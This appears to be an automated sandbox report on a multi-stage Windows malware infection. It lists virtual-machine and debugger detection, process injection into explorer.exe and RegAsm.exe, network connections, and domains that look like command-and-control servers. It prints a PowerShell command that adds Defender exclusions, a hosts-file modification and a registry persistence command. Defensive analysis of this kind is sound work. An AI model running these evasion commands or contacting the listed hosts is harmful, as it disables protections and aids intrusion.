Source: explorer.exe, 00000001.00000000.1704418772.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000002.2050274376.0000000000598000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000003.2038146611.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000002.2050274376.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000003.2040601116.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076988158.0000000000558000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076988158.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2900242612.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000011.00000003.2085851343.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2187461891.00000000017E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: A5B6.exe, 0000000A.00000002.2050274376.00000000005D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000021.00000003.2399253663.000000000C7D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: D3CC.exe, 00000015.00000003.2187461891.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, D3CC.exe, 00000015.00000002.2263138314.00000000017DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: explorer.exe, 00000001.00000000.1704948759.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000021.00000003.2380968458.000000000966E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000-RN%\
Source: explorer.exe, 00000021.00000002.2905755218.0000000007B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000021.00000002.2917900733.000000000C8CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000021.00000003.2390097431.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\q
Source: explorer.exe, 00000021.00000003.2402698538.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000021.00000003.2570047913.000000000966E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000021.00000003.2390097431.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000001.00000000.1704418772.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000021.00000003.2402698538.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: A5B6.exe, 0000000A.00000002.2050274376.00000000005D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000021.00000003.2402698538.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000001.00000000.1702723617.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1704418772.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000021.00000002.2917900733.000000000C894000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1701480079.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1704948759.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: filename.exe, 00000025.00000002.2391564926.0000020890C2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorer.exe, 00000021.00000003.2391233764.000000000C7D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 00000001.00000000.1701480079.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1702723617.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegAsm.exe, 00000014.00000002.2357748712.00000000012C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: A5B6.exe, 00000011.00000002.2900242612.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000011.00000003.2085851343.00000000008F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW*
Source: explorer.exe, 00000021.00000003.2403283453.000000000978D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000003.2380968458.000000000963C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000@v
Source: svchost.exe, 00000022.00000002.2449288829.000001BCEEE2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000021.00000002.2915501984.000000000C6DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000b)?
Source: RegAsm.exe, 00000014.00000002.2357748712.0000000001370000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000021.00000003.2380968458.000000000963C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1704418772.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1704418772.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: A5B6.exe, 00000011.00000002.2900242612.0000000000858000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: explorer.exe, 00000001.00000000.1704948759.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000021.00000003.2402698538.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
Source: explorer.exe, 00000021.00000003.2402698538.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\=
Source: explorer.exe, 00000021.00000003.2390097431.000000000C94E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000002.2898035450.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\filename.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\filename.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\filename.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\filename.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\filename.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\filename.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\filename.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\filename.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_02F2271C rdtsc 9_2_02F2271C
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00424168 _memset,IsDebuggerPresent, 10_2_00424168
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 10_2_0042A57A
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 10_2_00412220
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C80D90 mov eax, dword ptr fs:[00000030h] 0_2_02C80D90
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02C8092B mov eax, dword ptr fs:[00000030h] 0_2_02C8092B
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Code function: 0_2_02CD5A8D push dword ptr fs:[00000030h] 0_2_02CD5A8D
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_02D50D90 mov eax, dword ptr fs:[00000030h] 5_2_02D50D90
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_02D5092B mov eax, dword ptr fs:[00000030h] 5_2_02D5092B
Source: C:\Users\user\AppData\Roaming\uthsueb Code function: 5_2_02F65FA5 push dword ptr fs:[00000030h] 5_2_02F65FA5
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_02F210A3 push dword ptr fs:[00000030h] 9_2_02F210A3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B0042 push dword ptr fs:[00000030h] 9_2_049B0042
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_02F430A3 push dword ptr fs:[00000030h] 14_2_02F430A3
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 14_2_04A70042 push dword ptr fs:[00000030h] 14_2_04A70042
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_02F310A3 push dword ptr fs:[00000030h] 15_2_02F310A3
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Code function: 15_2_049B0042 push dword ptr fs:[00000030h] 15_2_049B0042
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004278D5 GetProcessHeap, 10_2_004278D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_004329BB SetUnhandledExceptionFilter, 10_2_004329BB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exe File created: C12E.exe.1.dr Jump to dropped file
Source: C:\Windows\explorer.exe Network Connect: 193.106.175.76 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.250.9.138 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.247.10.118 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 181.128.130.193 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.16.114 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.57.242.153 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.159.134.233 443 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\filename.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049B0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 9_2_049B0110
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Thread created: C:\Windows\explorer.exe EIP: 31719A0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Thread created: unknown EIP: 8CF19A0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\filename.exe NtQueryInformationProcess: Indirect: 0x7FF6E98819F6
Source: C:\Users\user\AppData\Local\Temp\filename.exe NtQuerySystemInformation: Indirect: 0x7FF6E98608D1
Source: C:\Users\user\AppData\Local\Temp\filename.exe NtQueryInformationProcess: Indirect: 0x7FF6E98B0E5F
Source: C:\Users\user\AppData\Local\Temp\filename.exe NtSetInformationThread: Indirect: 0x7FF6E98AC16B
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Memory written: C:\Users\user\AppData\Local\Temp\A5B6.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Memory written: C:\Users\user\AppData\Local\Temp\A5B6.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Memory written: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Memory written: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Memory written: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe base: 400000 value starts with: 4D5A
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: wifeplasterbakewis.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: mealplayerpreceodsju.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: bordersoarmanusjuw.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: suitcaseacanehalk.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: absentconvicsjawun.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: pushjellysingeywus.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: economicscreateojsu.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: entitlementappwo.shop
Source: D3CC.exe, 00000015.00000002.2260030251.000000000095C000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: greetclassifytalk.shop
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\MdeeRbWvqe.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\uthsueb Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\filename.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F32008
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle, 10_2_00419F90
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe C:\Users\user\AppData\Local\Temp\A5B6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Process created: C:\Users\user\AppData\Local\Temp\A5B6.exe "C:\Users\user\AppData\Local\Temp\A5B6.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe --Task Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user\AppData\Local\Temp\filename.exe"
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe Process created: C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe "C:\Users\user\AppData\Local\bc3a8265-4518-4f21-9fbc-86900b03148f\A5B6.exe" --AutoStart
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2580 -ip 2580
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 8792
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: explorer.exe, 00000001.00000000.1702492744.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1701667296.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1704418772.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1701667296.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000002.2905646104.0000000005230000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2898035450.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000021.00000002.2903100325.0000000005002000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman$
Source: explorer.exe, 00000001.00000000.1701480079.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1701667296.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1701667296.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: 9_2_049D80F6 cpuid 9_2_049D80F6
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 9_2_049F0AB6
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 10_2_00438178
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 10_2_00440116
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 10_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\A5B6.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 10_2_0043834F
